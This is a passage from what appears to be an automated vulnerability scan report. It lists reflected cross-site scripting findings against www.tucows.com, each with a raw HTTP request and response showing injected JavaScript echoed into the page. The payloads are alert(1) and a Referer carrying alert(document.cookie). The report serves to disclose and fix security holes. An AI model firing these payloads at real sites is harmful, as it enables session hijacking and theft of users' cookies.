Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.131. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d536b"-alert(1)-"a064303b2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/xdocsize.jsd536b"-alert(1)-"a064303b2a1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.132. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beba4"-alert(1)-"b69b27dceac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesbeba4"-alert(1)-"b69b27dceac/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.133. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ff"-alert(1)-"ccf5c4f6b2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js873ff"-alert(1)-"ccf5c4f6b2d/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.134. http://www.tucows.com/includes/js/yetii.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd99a"-alert(1)-"3c47dc9c7d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/yetii.jsdd99a"-alert(1)-"3c47dc9c7d2";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.135. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f648"-alert(1)-"92dc0f19f81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5f648"-alert(1)-"92dc0f19f81/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.136. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbe1d"-alert(1)-"607a37a5993 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themesfbe1d"-alert(1)-"607a37a5993/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.137. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e65b"-alert(1)-"157ede0dbba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany8e65b"-alert(1)-"157ede0dbba/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.138. http://www.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b311"-alert(1)-"4061c82776f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.139. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.140. http://www.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32536

